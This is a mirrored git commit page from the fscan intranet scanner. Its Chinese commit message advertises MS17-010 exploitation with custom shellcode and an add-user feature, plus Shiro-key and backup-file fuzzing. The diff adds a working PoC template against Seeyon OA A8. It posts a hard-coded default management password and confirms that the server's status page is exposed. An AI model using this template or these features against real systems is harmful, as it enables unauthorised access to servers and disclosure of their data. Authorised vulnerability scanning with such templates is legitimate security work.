mirror of
https://github.com/shadow1ng/fscan.git
synced 2026-09-26 21:21:53 +08:00
加强poc fuzz模块,支持跑备份文件、目录、shiro-key(默认跑10key,可用-full参数跑100key)等。新增ms17017利用(使用参数: -sc add),可在ms17010-exp.go自定义shellcode,内置添加用户等功能。 新增poc、指纹。支持socks5代理。因body指纹更全,默认不再跑ico图标。
This commit is contained in:
@@ -0,0 +1,18 @@
|
||||
name: poc-yaml-seeyon-oa-a8-m-information-disclosure
|
||||
manual: true
|
||||
transport: http
|
||||
rules:
|
||||
- method: GET
|
||||
path: /seeyon/management/index.jsp
|
||||
expression: response.status == 200
|
||||
- method: POST
|
||||
path: /seeyon/management/index.jsp
|
||||
headers:
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
body: password=WLCCYBD%40SEEYON
|
||||
follow_redirects: true
|
||||
expression: response.status == 200 && response.body.bcontains(bytes("Free Physical Memory Size"))
|
||||
detail:
|
||||
author: Monday
|
||||
links:
|
||||
- http://wiki.peiqi.tech/wiki/oa/%E8%87%B4%E8%BF%9COA/%E8%87%B4%E8%BF%9COA%20A8%20status.jsp%20%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.html
|
||||
Reference in New Issue
Block a user